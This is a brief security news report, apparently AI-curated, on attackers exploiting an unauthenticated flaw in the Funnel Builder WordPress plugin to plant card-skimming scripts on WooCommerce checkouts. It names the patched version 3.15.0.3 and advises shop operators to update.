Skip to content

Funnel Builder Plugin: Active Exploitation of WooCommerce Checkout Vulnerability

In short: Attackers are exploiting an unauthenticated vulnerability in the Funnel Builder plugin to inject malicious JavaScript skimmers on checkout pages and steal credit card data.

The WordPress plugin Funnel Builder is currently under active attack to inject malware into WooCommerce checkouts and steal payment data. Versions prior to 3.15.0.3, which run on over 40,000 shops, are affected.

Security researchers from Dutch firm Sansec documented an ongoing exploitation campaign against the WordPress plugin Funnel Builder this week. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript code via the plugin’s “External Scripts” configuration on any checkout page of an affected shop.

The attackers disguise their code injections as legitimate Google Tag Manager scripts. Behind the scenes, these skimmers covertly extract payment data, particularly credit card numbers, CVV codes, and billing addresses during checkout. According to Sansec’s analysis, Funnel Builder exposes a checkout endpoint that allows incoming requests to execute arbitrary internal methods.

The plugin is used by over 40,000 WooCommerce shops. FunnelKit, the company behind Funnel Builder, released a patch with version 3.15.0.3. An official CVE identifier has not yet been assigned to the vulnerability. All versions prior to 3.15.0.3 are affected. Shop operators should update their installation immediately and check for suspicious external script entries in the plugin configurations.


Source: ainews-dev.lumi-systems.io · Published May 16, 2026
Lumi AI News — AI-assisted curation pursuant to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.5.2.

Share on: